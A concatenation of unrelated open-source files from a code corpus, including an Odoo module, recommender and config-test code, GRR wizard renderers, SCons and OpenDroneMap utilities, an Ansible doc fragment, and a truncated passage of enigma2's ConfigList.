'[?]', # 0x38
'[?]', # 0x39
'[?]', # 0x3a
'[?]', # 0x3b
'[?]', # 0x3c
'[?]', # 0x3d
'[?]', # 0x3e
'[?]', # 0x3f
'', # 0x40
'', # 0x41
'', # 0x42
'', # 0x43
'', # 0x44
'', # 0x45
'', # 0x46
'', # 0x47
'', # 0x48
'', # 0x49
'', # 0x4a
'[?]', # 0x4b
'[?]', # 0x4c
'[?]', # 0x4d
'[?]', # 0x4e
'[?]', # 0x4f
'[?]', # 0x50
'[?]', # 0x51
'[?]', # 0x52
'[?]', # 0x53
'[?]', # 0x54
'[?]', # 0x55
'[?]', # 0x56
'[?]', # 0x57
'[?]', # 0x58
'[?]', # 0x59
'[?]', # 0x5a
'[?]', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'[?]', # 0x5f
'1', # 0x60
'2', # 0x61
'3', # 0x62
'4', # 0x63
'5', # 0x64
'6', # 0x65
'7', # 0x66
'8', # 0x67
'9', # 0x68
'10', # 0x69
'11', # 0x6a
'12', # 0x6b
'13', # 0x6c
'14', # 0x6d
'15', # 0x6e
'16', # 0x6f
'17', # 0x70
'18', # 0x71
'19', # 0x72
'20', # 0x73
'(1)', # 0x74
'(2)', # 0x75
'(3)', # 0x76
'(4)', # 0x77
'(5)', # 0x78
'(6)', # 0x79
'(7)', # 0x7a
'(8)', # 0x7b
'(9)', # 0x7c
'(10)', # 0x7d
'(11)', # 0x7e
'(12)', # 0x7f
'(13)', # 0x80
'(14)', # 0x81
'(15)', # 0x82
'(16)', # 0x83
'(17)', # 0x84
'(18)', # 0x85
'(19)', # 0x86
'(20)', # 0x87
'1.', # 0x88
'2.', # 0x89
'3.', # 0x8a
'4.', # 0x8b
'5.', # 0x8c
'6.', # 0x8d
'7.', # 0x8e
'8.', # 0x8f
'9.', # 0x90
'10.', # 0x91
'11.', # 0x92
'12.', # 0x93
'13.', # 0x94
'14.', # 0x95
'15.', # 0x96
'16.', # 0x97
'17.', # 0x98
'18.', # 0x99
'19.', # 0x9a
'20.', # 0x9b
'(a)', # 0x9c
'(b)', # 0x9d
'(c)', # 0x9e
'(d)', # 0x9f
'(e)', # 0xa0
'(f)', # 0xa1
'(g)', # 0xa2
'(h)', # 0xa3
'(i)', # 0xa4
'(j)', # 0xa5
'(k)', # 0xa6
'(l)', # 0xa7
'(m)', # 0xa8
'(n)', # 0xa9
'(o)', # 0xaa
'(p)', # 0xab
'(q)', # 0xac
'(r)', # 0xad
'(s)', # 0xae
'(t)', # 0xaf
'(u)', # 0xb0
'(v)', # 0xb1
'(w)', # 0xb2
'(x)', # 0xb3
'(y)', # 0xb4
'(z)', # 0xb5
'a', # 0xb6
'b', # 0xb7
'c', # 0xb8
'd', # 0xb9
'e', # 0xba
'f', # 0xbb
'g', # 0xbc
'h', # 0xbd
'i', # 0xbe
'j', # 0xbf
'k', # 0xc0
'l', # 0xc1
'm', # 0xc2
'n', # 0xc3
'o', # 0xc4
'p', # 0xc5
'q', # 0xc6
'r', # 0xc7
's', # 0xc8
't', # 0xc9
'u', # 0xca
'v', # 0xcb
'w', # 0xcc
'x', # 0xcd
'y', # 0xce
'z', # 0xcf
'a', # 0xd0
'b', # 0xd1
'c', # 0xd2
'd', # 0xd3
'e', # 0xd4
'f', # 0xd5
'g', # 0xd6
'h', # 0xd7
'i', # 0xd8
'j', # 0xd9
'k', # 0xda
'l', # 0xdb
'm', # 0xdc
'n', # 0xdd
'o', # 0xde
'p', # 0xdf
'q', # 0xe0
'r', # 0xe1
's', # 0xe2
't', # 0xe3
'u', # 0xe4
'v', # 0xe5
'w', # 0xe6
'x', # 0xe7
'y', # 0xe8
'z', # 0xe9
'0', # 0xea
'[?]', # 0xeb
'[?]', # 0xec
'[?]', # 0xed
'[?]', # 0xee
'[?]', # 0xef
'[?]', # 0xf0
'[?]', # 0xf1
'[?]', # 0xf2
'[?]', # 0xf3
'[?]', # 0xf4
'[?]', # 0xf5
'[?]', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
|
mikelarre/odoomrp-wip-1
|
refs/heads/8.0
|
mrp_machine_manager/__init__.py
|
18
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# Daniel Campos (danielcampos@avanzosc.es) Date: 08/09/2014
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
from . import models
|
rochoa85/pyMIC
|
refs/heads/master
|
examples/data_map/data_map.py
|
1
|
#!/usr/bin/python
# Copyright (c) 2014, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pyMIC as mic
import numpy as np
device = mic.devices[0]
a = device.zeros((8,8))
|
Coder-Yu/RecQ
|
refs/heads/master
|
baseclass/SocialRecommender.py
|
2
|
from baseclass.IterativeRecommender import IterativeRecommender
from data.social import SocialDAO
from tool import config
from os.path import abspath
class SocialRecommender(IterativeRecommender):
def __init__(self,conf,trainingSet,testSet,relation,fold='[1]'):
super(SocialRecommender, self).__init__(conf,trainingSet,testSet,fold)
self.social = SocialDAO(self.config,relation) #social relations access control
# data clean: drop social relations whose users are absent from the training set
cleanList = []
cleanPair = []
for user in self.social.followees:
if not self.data.user.has_key(user):
cleanList.append(user)
for u2 in self.social.followees[user]:
if not self.data.user.has_key(u2):
cleanPair.append((user, u2))
for u in cleanList:
del self.social.followees[u]
for pair in cleanPair:
if self.social.followees.has_key(pair[0]):
del self.social.followees[pair[0]][pair[1]]
cleanList = []
cleanPair = []
for user in self.social.followers:
if not self.data.user.has_key(user):
cleanList.append(user)
for u2 in self.social.followers[user]:
if not self.data.user.has_key(u2):
cleanPair.append((user, u2))
for u in cleanList:
del self.social.followers[u]
for pair in cleanPair:
if self.social.followers.has_key(pair[0]):
del self.social.followers[pair[0]][pair[1]]
idx = []
for n,pair in enumerate(self.social.relation):
if pair[0] not in self.data.user or pair[1] not in self.data.user:
idx.append(n)
for item in reversed(idx):
del self.social.relation[item]
def readConfiguration(self):
super(SocialRecommender, self).readConfiguration()
regular = config.LineConfig(self.config['reg.lambda'])
self.regS = float(regular['-s'])
def printAlgorConfig(self):
super(SocialRecommender, self).printAlgorConfig()
print 'Social dataset:',abspath(self.config['social'])
print 'Social size ','(User count:',len(self.social.user),'Trust statement count:'+str(len(self.social.relation))+')'
print 'Social Regularization parameter: regS %.3f' % (self.regS)
print '=' * 80
|
mattjmcnaughton/sdep
|
refs/heads/master
|
tests/test_config.py
|
1
|
"""
Tests for the `config`.
"""
# pylint: disable=import-error
import os
import shutil
import tempfile
import unittest
import uuid
from collections import namedtuple
import simplejson as json
from mock import patch
from sdep.config import Config, ConfigParseError
class ConfigTestCase(unittest.TestCase):
"""
Test cases for the `Config` class.
"""
# MockDirs is a helper named tuple making it easier to return the temporary
# dirs with which we will mock the `current` and `home` dirs.
MockDirs = namedtuple("MockDirs", "current home")
def test_load_config_from_file(self):
"""
Test that we properly read in the configuration when it is specified
through a file.
"""
config_file = self._create_config_file()
config = Config(config_file=config_file)
for field in self._all_fields():
self.assertNotEqual(config.get(field), None)
os.remove(config_file)
def test_load_config_from_env(self):
"""
Test that we properly read in the configuration when it is specified in
environment variables.
"""
environ_dict = {key.upper(): value for key, value in
self._config_dict().items()}
with patch.dict(os.environ, environ_dict, clear=True):
config = Config()
for field in self._all_fields():
self.assertNotEqual(config.get(field), None)
def test_find_config_in_curr_dir(self):
"""
Test that we locate the configuration file when it is not explicitly
specified in the command line, but rather located in the curr directory
from which the tests are run.
"""
temp_dirs = self._create_mock_dirs()
with patch('os.getcwd', return_value=temp_dirs.current):
with patch('os.path.expanduser', return_value=temp_dirs.home):
config_in_curr = os.path.join(os.getcwd(),
Config.DEFAULT_CONFIG_FILE_NAME)
self._create_config_file(config_in_curr)
config = Config()
self.assertEqual(config_in_curr, Config.locate_config_file())
for field in self._all_fields():
self.assertNotEqual(config.get(field), None)
for temp_dir in [temp_dirs.current, temp_dirs.home]:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_find_config_in_home_dir(self):
"""
Test that we locate the configuration file when it is not explicitly
specified in the command line, but rather located in the users home
dir.
"""
# @TODO Is there too much overlap between this method and
# `test_find_config_in_home_dir`?
temp_dirs = self._create_mock_dirs()
with patch('os.getcwd', return_value=temp_dirs.current):
with patch('os.path.expanduser', return_value=temp_dirs.home):
config_in_home = os.path.join(os.path.expanduser("~"),
Config.DEFAULT_CONFIG_FILE_NAME)
self._create_config_file(config_in_home)
config = Config()
self.assertEqual(config_in_home, Config.locate_config_file())
for field in self._all_fields():
self.assertNotEqual(config.get(field), None)
for temp_dir in [temp_dirs.current, temp_dirs.home]:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_bad_config(self):
"""
Test loading the configuration from a file with an improperly specified
configuration.
"""
config_file = self._create_bad_config_file()
with self.assertRaises(ConfigParseError):
Config(config_file=config_file)
@classmethod
def _config_dict(cls):
"""
A dictionary of properly formatted config.
Returns:
dict: A properly formatted config.
"""
base_dict = {field: str(uuid.uuid4()) for field in cls._all_fields()}
# Remove one of the optional fields so that we can test the default value
# being filled in.
field_to_remove = Config.optional_config_fields()[0]
del base_dict[field_to_remove]
return base_dict
@classmethod
def _create_mock_dirs(cls):
"""
A helper method to create two separate temporary directories which we
will use to mock the current and home directory respectively. Using this
method, in conjunction with mocking, allows us to completely isolate our
test suite from the user's local filesystem.
Returns:
MockDirs: The locations of the mock directories.
"""
temp_current = tempfile.mkdtemp()
temp_home = tempfile.mkdtemp()
return cls.MockDirs(current=temp_current, home=temp_home)
def _create_config_file(self, file_name=None):
"""
A helper method to create a demo working configuration file.
Args:
file_name(Optional[str]): The location for the desired configuration
file.
Returns:
str: The path to the given configuration file.
"""
good_config_dict = self._config_dict()
if file_name is None:
_, file_name = tempfile.mkstemp()
with open(file_name, "w+") as new_config_file:
new_config_file.write(json.dumps(good_config_dict))
return file_name
@staticmethod
def _create_bad_config_file():
"""
A helper method to create a configuration file that will raise an
exception when I try to parse it.
Returns:
str: The path to the given non-working configuration file.
"""
_, file_name = tempfile.mkstemp()
with open(file_name, "w+") as bad_config_file:
bad_config_file.write(json.dumps({}))
return file_name
@staticmethod
def _all_fields():
"""
Helper method to return all configuration fields.
Returns:
list: List of the strings for all configuration fields.
"""
return Config.required_config_fields() + Config.optional_config_fields()
|
spnow/grr
|
refs/heads/master
|
gui/plugins/wizards.py
|
2
|
#!/usr/bin/env python
"""Implementation of an interactive wizard widget."""
from grr.gui import renderers
from grr.gui.plugins import forms
from grr.lib import aff4
from grr.lib import rdfvalue
class WizardRenderer(renderers.TemplateRenderer):
"""This renderer creates a wizard."""
current_page = 0
# WizardPage objects that define this wizard's behaviour.
title = ""
pages = []
# This will be used for identifying the wizard when publishing the events.
wizard_name = "wizard"
layout_template = renderers.Template("""
<div id="Wizard_{{unique|escape}}" class="Wizard FormData"
data-current='{{this.current_page|escape}}'
data-max_page='{{this.max_pages|escape}}'
>
{% for i, page, page_cls, page_renderer in this.raw_pages %}
<div id="Page_{{i|escape}}" class="WizardPage"
data-renderer="{{page_renderer|escape}}"
style="display: none">
<div class="WizardBar modal-header">
<button type="button" class="close" data-dismiss="modal"
aria-hidden="true">x</button>
<h3>{{this.title|escape}} -
<span class="Description">
{{page_cls.description|escape}}
</span>
</h3>
</div>
<div class="modal-body">
{{page|safe}}
</div>
</div>
{% endfor %}
<div class="modal-footer navbar-inner">
<ul class="nav pull-left">
<div id="Message{{unique}}"/>
<div class="navbar-text" id="footer_message_{{unique}}"></div>
</ul>
<ul class="nav nav pull-right">
<button class="btn Back" style='display: none'>Back</button>
<button class="btn btn-primary Next">Next</button>
<button class="btn btn-primary Finish" style='display: none'
data-dismiss="modal"
>
Finish
</button>
</ul>
</div>
</div>
""")
def Layout(self, request, response):
"""Render the content of the tab or the container tabset."""
self.raw_pages = []
for i, page_cls in enumerate(self.pages):
# Make the page renderers dump all their data to the wizard DOM node.
page_renderer = page_cls(id=self.id)
self.raw_pages.append((i, page_renderer.RawHTML(request),
page_cls, page_cls.__name__))
self.max_pages = len(self.pages) - 1
super(WizardRenderer, self).Layout(request, response)
return self.CallJavascript(response, "WizardRenderer.Layout")
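# Hedged subclass sketch (the page renderer classes shown are hypothetical;
# per Layout above, each entry in `pages` must be a renderer class exposing a
# `description` attribute and RawHTML()):
#
#     class NewHuntWizard(WizardRenderer):
#         title = "New Hunt"
#         wizard_name = "new_hunt"
#         pages = [SelectRulesPage, ReviewHuntPage]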
class AFF4AttributeFormRenderer(forms.TypeDescriptorFormRenderer):
"""A renderer for AFF4 attribute forms."""
type = rdfvalue.AFF4Attribute
layout_template = """<div class="control-group">
""" + forms.TypeDescriptorFormRenderer.default_description_view + """
<div class="controls">
<select id="{{this.prefix}}" class="unset"
onchange="grr.forms.inputOnChange(this)"
>
{% for name in this.attributes %}
{% if name %}
<option {% ifequal name this.value %}selected{% endifequal %}
value="{{name|escape}}">
{{name|escape}}
{% ifequal name this.value %} (default){% endifequal %}
</option>
{% endif %}
{% endfor %}
</select>
</div>
</div>
"""
def __init__(self, **kwargs):
super(AFF4AttributeFormRenderer, self).__init__(**kwargs)
self.attributes = ["Unset"]
self.attributes.extend(sorted(aff4.Attribute.NAMES.keys()))
|
engineer0x47/SCONS
|
refs/heads/master
|
engine/SCons/Tool/aixcc.py
|
2
|
"""SCons.Tool.aixcc
Tool-specific initialization for IBM xlc / Visual Age C compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/aixcc.py 2014/08/24 12:12:31 garyo"
import os.path
import SCons.Platform.aix
import cc
packages = ['vac.C', 'ibmcxx.cmp']
def get_xlc(env):
xlc = env.get('CC', 'xlc')
return SCons.Platform.aix.get_xlc(env, xlc, packages)
def generate(env):
"""Add Builders and construction variables for xlc / Visual Age
suite to an Environment."""
path, _cc, version = get_xlc(env)
if path and _cc:
_cc = os.path.join(path, _cc)
if 'CC' not in env:
env['CC'] = _cc
cc.generate(env)
if version:
env['CCVERSION'] = version
def exists(env):
path, _cc, version = get_xlc(env)
if path and _cc:
xlc = os.path.join(path, _cc)
if os.path.exists(xlc):
return xlc
return None
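# Typical SConstruct use (illustrative): request the tool explicitly and let
# get_xlc() locate the compiler on AIX:
#
#     env = Environment(tools=['aixcc'])
#     env.Program('hello.c')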
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
pierotofy/OpenDroneMap
|
refs/heads/master
|
opendm/system.py
|
2
|
import os
import errno
import json
import datetime
import sys
import subprocess
import string
import signal
from opendm import context
from opendm import log
def get_ccd_widths():
"""Return the CCD Width of the camera listed in the JSON defs file."""
with open(context.ccd_widths_path) as f:
sensor_data = json.loads(f.read())
return dict(zip(map(string.lower, sensor_data.keys()), sensor_data.values()))
running_subprocesses = []
cleanup_callbacks = []
def add_cleanup_callback(func):
global cleanup_callbacks
cleanup_callbacks.append(func)
def remove_cleanup_callback(func):
global cleanup_callbacks
try:
cleanup_callbacks.remove(func)
except ValueError as e:
log.ODM_EXCEPTION("Tried to remove %s from cleanup_callbacks but got: %s" % (str(func), str(e)))
def exit_gracefully():
global running_subprocesses
global cleanup_callbacks
log.ODM_WARNING("Caught TERM/INT signal, attempting to exit gracefully...")
for cb in cleanup_callbacks:
cb()
for sp in running_subprocesses:
log.ODM_WARNING("Sending TERM signal to PID %s..." % sp.pid)
os.killpg(os.getpgid(sp.pid), signal.SIGTERM)
os._exit(1)
def sighandler(signum, frame):
exit_gracefully()
signal.signal(signal.SIGINT, sighandler)
signal.signal(signal.SIGTERM, sighandler)
def run(cmd, env_paths=[context.superbuild_bin_path], env_vars={}, packages_paths=context.python_packages_paths):
"""Run a system command"""
global running_subprocesses
log.ODM_INFO('running %s' % cmd)
env = os.environ.copy()
if len(env_paths) > 0:
env["PATH"] = env["PATH"] + ":" + ":".join(env_paths)
if len(packages_paths) > 0:
env["PYTHONPATH"] = env.get("PYTHONPATH", "") + ":" + ":".join(packages_paths)
for k in env_vars:
env[k] = str(env_vars[k])
p = subprocess.Popen(cmd, shell=True, env=env, preexec_fn=os.setsid)
running_subprocesses.append(p)
retcode = p.wait()
running_subprocesses.remove(p)
if retcode < 0:
raise Exception("Child was terminated by signal {}".format(-retcode))
elif retcode > 0:
raise Exception("Child returned {}".format(retcode))
def now():
"""Return the current time"""
return datetime.datetime.now().strftime('%a %b %d %H:%M:%S %Z %Y')
def now_raw():
return datetime.datetime.now()
def benchmark(start, benchmarking_file, process):
"""
runs a benchmark with a start datetime object
:return: None (the running time in seconds is appended to the benchmarking file)
"""
# Write to benchmark file
delta = (datetime.datetime.now() - start).total_seconds()
with open(benchmarking_file, 'a') as b:
b.write('%s runtime: %s seconds\n' % (process, delta))
def mkdir_p(path):
"""Make a directory including parent directories.
"""
try:
os.makedirs(path)
except os.error as exc:
if exc.errno != errno.EEXIST or not os.path.isdir(path):
raise
# Python2 shutil.which
def which(program):
    path = os.getenv('PATH')
    for p in path.split(os.path.pathsep):
        p = os.path.join(p, program)
        if os.path.exists(p) and os.access(p, os.X_OK):
            return p
    return None
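if __name__ == '__main__':
    # Minimal usage sketch (my addition, not part of the original module):
    # exercises the self-contained helpers; assumes an 'ls' binary on PATH
    # and a writable /tmp.
    print which('ls')
    mkdir_p('/tmp/odm_example_dir')
    print now()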
|
resmo/ansible
|
refs/heads/devel
|
lib/ansible/plugins/doc_fragments/tower.py
|
38
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Wayne Witzel III <wayne@riotousliving.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Ansible Tower documentation fragment
DOCUMENTATION = r'''
options:
tower_host:
description:
- URL to your Tower instance.
type: str
tower_username:
description:
- Username for your Tower instance.
type: str
tower_password:
description:
- Password for your Tower instance.
type: str
validate_certs:
description:
- Whether to allow insecure connections to Tower.
- If C(no), SSL certificates will not be validated.
- This should only be used on personally controlled sites using self-signed certificates.
type: bool
aliases: [ tower_verify_ssl ]
tower_config_file:
description:
- Path to the Tower config file.
type: path
requirements:
- ansible-tower-cli >= 3.0.2
notes:
- If no I(config_file) is provided we will attempt to use the tower-cli library
defaults to find your Tower host information.
- I(config_file) should contain Tower configuration in the following format
host=hostname
username=username
password=password
'''
|
iDTLabssl/account-financial-tools
|
refs/heads/8.0
|
account_auto_fy_sequence/__openerp__.py
|
18
|
# coding=utf-8
##############################################################################
#
# account_auto_fy_sequence module for Odoo
# Copyright (C) 2014 ACSONE SA/NV (<http://acsone.eu>)
# @author Stéphane Bidoul <stephane.bidoul@acsone.eu>
#
# account_auto_fy_sequence is free software:
# you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License v3 or later
# as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# account_auto_fy_sequence is distributed
# in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License v3 or later for more details.
#
# You should have received a copy of the GNU Affero General Public License
# v3 or later along with this program.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Automatic Fiscal Year Sequences',
'version': '0.1',
'category': 'Accounting',
'author': "ACSONE SA/NV,Odoo Community Association (OCA)",
'website': 'http://acsone.eu',
'depends': ['account'],
'data': [
'views/ir_sequence_view.xml',
],
'installable': True,
'application': False,
'auto_install': False,
'license': 'AGPL-3',
}
|
0sc0d3r/enigma2
|
refs/heads/master
|
lib/python/Components/ConfigList.py
|
13
|
from HTMLComponent import HTMLComponent
from GUIComponent import GUIComponent
from config import KEY_LEFT, KEY_RIGHT, KEY_HOME, KEY_END, KEY_0, KEY_DELETE, KEY_BACKSPACE, KEY_OK, KEY_TOGGLEOW, KEY_ASCII, KEY_TIMEOUT, KEY_NUMBERS, config, configfile, ConfigElement, ConfigText, ConfigPassword
from Components.ActionMap import NumberActionMap, ActionMap
from enigma import eListbox, eListboxPythonConfigContent, eRCInput, eTimer, quitMainloop
from Screens.MessageBox import MessageBox
from Screens.ChoiceBox import ChoiceBox
import skin
class ConfigList(HTMLComponent, GUIComponent, object):
def __init__(self, list, session = None):
GUIComponent.__init__(self)
self.l = eListboxPythonConfigContent()
seperation, = skin.parameters.get("ConfigListSeperator", (350, ))
self.l.setSeperation(seperation)
self.timer = eTimer()
self.list = list
self.onSelectionChanged = [ ]
self.current = None
self.session = session
def execBegin(self):
rcinput = eRCInput.getInstance()
if not config.misc.remotecontrol_text_support.value:
rcinput.setKeyboardMode(rcinput.kmAscii)
else:
rcinput.setKeyboardMode(rcinput.kmNone)
self.timer.callback.append(self.timeout)
def execEnd(self):
rcinput = eRCInput.getInstance()
rcinput.setKeyboardMode(rcinput.kmNone)
self.timer.callback.remove(self.timeout)
def toggle(self):
selection = self.getCurrent()
selection[1].toggle()
self.invalidateCurrent()
def handleKey(self, key):
selection = self.getCurrent()
if selection and selection[1].enabled:
selection[1].handleKey(key)
self.invalidateCurrent()
if key in KEY_NUMBERS:
self.timer.start(1000, 1)
def getCurrent(self):
return self.l.getCurrentSelection()
def getCurrentIndex(self):
return self.l.getCurrentSelectionIndex()
def setCurrentIndex(self, index):
if self.instance is not None:
self.instance.moveSelectionTo(index)
def invalidateCurrent(self):
self.l.invalidateEntry(self.l.getCurrentSelectionIndex())
def invalidate(self, entry):
		# When the entry to invalidate does not exist, just ignore the request.
		# This simplifies conditional setup screens a lot.
if entry in self.__list:
self.l.invalidateEntry(self.__list.index(entry))
GUI_WIDGET = eListbox
def selectionChanged(self):
if isinstance(self.current,tuple) and len(self.current) >= 2:
self.current[1].onDeselect(self.session)
self.current = self.getCurrent()
if isinstance(self.current,tuple) and len(self.current) >= 2:
self.current[1].onSelect(self.session)
else:
return
for x in self.onSelectionChanged:
x()
def postWidgetCreate(self, instance):
instance.selectionChanged.get().append(self.selectionChanged)
instance.setContent(self.l)
self.instance.setWrapAround(True)
def preWidgetRemove(self, instance):
if isinstance(self.current,tuple) and len(self.current) >= 2:
self.current[1].onDeselect(self.session)
instance.selectionChanged.get().remove(self.selectionChanged)
instance.setContent(None)
def setList(self, l):
self.timer.stop()
self.__list = l
self.l.setList(self.__list)
if l is not None:
for x in l:
assert len(x) < 2 or isinstance(x[1], ConfigElement), "entry in ConfigList " + str(x[1]) + " must be a ConfigElement"
def getList(self):
return self.__list
list = property(getList, setList)
def timeout(self):
self.handleKey(KEY_TIMEOUT)
def isChanged(self):
is_changed = False
for x in self.list:
is_changed |= x[1].isChanged()
return is_changed
def pageUp(self):
if self.instance is not None:
self.instance.moveSelection(self.instance.pageUp)
def pageDown(self):
if self.instance is not None:
self.instance.moveSelection(self.instance.pageDown)
def moveUp(self):
if self.instance is not None:
self.instance.moveSelection(self.instance.moveUp)
def moveDown(self):
if self.instance is not None:
self.instance.moveSelection(self.instance.moveDown)
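# Illustrative only (my addition): the ConfigList above expects a list of
# (description, ConfigElement) tuples, e.g.
#   ConfigList([("Some option", config.usage.some_option)], session=session)
# where config.usage.some_option is a hypothetical ConfigElement.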
class ConfigListScreen:
def __init__(self, list, session = None, on_change = None):
self["config_actions"] = NumberActionMap(["SetupActions", "InputAsciiActions", "KeyboardInputActions"],
{
"gotAsciiCode": self.keyGotAscii,
"ok": self.keyOK,
"left": self.keyLeft,
"right": self.keyRight,
"home": self.keyHome,
"end": self.keyEnd,
"deleteForward": self.keyDelete,
"deleteBackward": self.keyBackspace,
"toggleOverwrite": self.keyToggleOW,
"pageUp": self.keyPageUp,
"pageDown": self.keyPageDown,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal,
"file" : self.keyFile
}, -1) # to prevent left/right overriding the listbox
self.onChangedEntry = []
self["VirtualKB"] = ActionMap(["VirtualKeyboardActions"],
{
"showVirtualKeyboard": self.KeyText,
}, -2)
self["VirtualKB"].setEnabled(False)
self["config"] = ConfigList(list, session = session)
if on_change is not None:
self.__changed = on_change
else:
self.__changed = lambda: None
if not self.handleInputHelpers in self["config"].onSelectionChanged:
self["config"].onSelectionChanged.append(self.handleInputHelpers)
def createSummary(self):
self.setup_title = self.getTitle()
from Screens.Setup import SetupSummary
return SetupSummary
def getCurrentEntry(self):
return self["config"].getCurrent() and self["config"].getCurrent()[0] or ""
def getCurrentValue(self):
return self["config"].getCurrent() and str(self["config"].getCurrent()[1].getText()) or ""
def getCurrentDescription(self):
return self["config"].getCurrent() and len(self["config"].getCurrent()) > 2 and self["config"].getCurrent()[2] or ""
def changedEntry(self):
for x in self.onChangedEntry:
x()
def handleInputHelpers(self):
if self["config"].getCurrent() is not None:
try:
if isinstance(self["config"].getCurrent()[1], ConfigText) or isinstance(self["config"].getCurrent()[1], ConfigPassword):
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(True)
self["VKeyIcon"].boolean = True
if self.has_key("HelpWindow"):
if self["config"].getCurrent()[1].help_window.instance is not None:
helpwindowpos = self["HelpWindow"].getPosition()
from enigma import ePoint
self["config"].getCurrent()[1].help_window.instance.move(ePoint(helpwindowpos[0],helpwindowpos[1]))
else:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
except:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
else:
if self.has_key("VKeyIcon"):
self["VirtualKB"].setEnabled(False)
self["VKeyIcon"].boolean = False
def KeyText(self):
from Screens.VirtualKeyBoard import VirtualKeyBoard
self.session.openWithCallback(self.VirtualKeyBoardCallback, VirtualKeyBoard, title = self["config"].getCurrent()[0], text = self["config"].getCurrent()[1].value)
def VirtualKeyBoardCallback(self, callback = None):
if callback is not None and len(callback):
self["config"].getCurrent()[1].setValue(callback)
self["config"].invalidate(self["config"].getCurrent())
def keyOK(self):
self["config"].handleKey(KEY_OK)
def keyLeft(self):
self["config"].handleKey(KEY_LEFT)
self.__changed()
def keyRight(self):
self["config"].handleKey(KEY_RIGHT)
self.__changed()
def keyHome(self):
self["config"].handleKey(KEY_HOME)
self.__changed()
def keyEnd(self):
self["config"].handleKey(KEY_END)
self.__changed()
def keyDelete(self):
self["config"].handleKey(KEY_DELETE)
self.__changed()
def keyBackspace(self):
self["config"].handleKey(KEY_BACKSPACE)
self.__changed()
def keyToggleOW(self):
self["config"].handleKey(KEY_TOGGLEOW)
self.__changed()
def keyGotAscii(self):
